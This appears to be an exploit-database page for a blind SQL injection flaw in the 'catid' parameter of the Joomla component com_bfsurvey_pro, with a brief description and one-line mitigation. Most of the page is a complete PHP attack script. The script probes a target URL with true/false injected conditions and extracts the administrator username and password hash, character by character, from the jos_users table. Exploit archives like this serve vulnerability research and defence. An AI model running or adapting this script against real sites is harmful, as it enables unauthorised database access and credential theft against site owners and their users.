header-logo
Suggest Exploit
vendor:
com_bfsurvey_pro
by:
FL0RiX
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_bfsurvey_pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

com_bfsurvey_pro (catid) Blind SQL Injection Exploit

This exploit is related to a blind SQL injection vulnerability in the com_bfsurvey_pro component of Joomla. The vulnerability is triggered when the 'catid' parameter is not properly sanitized before being used in an SQL query. This allows an attacker to inject arbitrary SQL code into the query, which can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

<?php
ini_set("max_execution_time",0);
print_r('

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------
@~~=Author   : FL0RiX

@~~=Greez    : Wretch-x,Dr.KaCaK & All Friends

@~~=Bug :)   : com_bfsurvey_pro (catid) Blind SQL Injection Exploit

@~~=WARNING! :  : php fl0rix.php "http://www.site.com/index.php?option=com_bfsurvey_pro&view=bfsurveypro&catid=53"
---------------Ooooo-------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)


');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?>

Navigation

Suggest Exploit

Services By CQR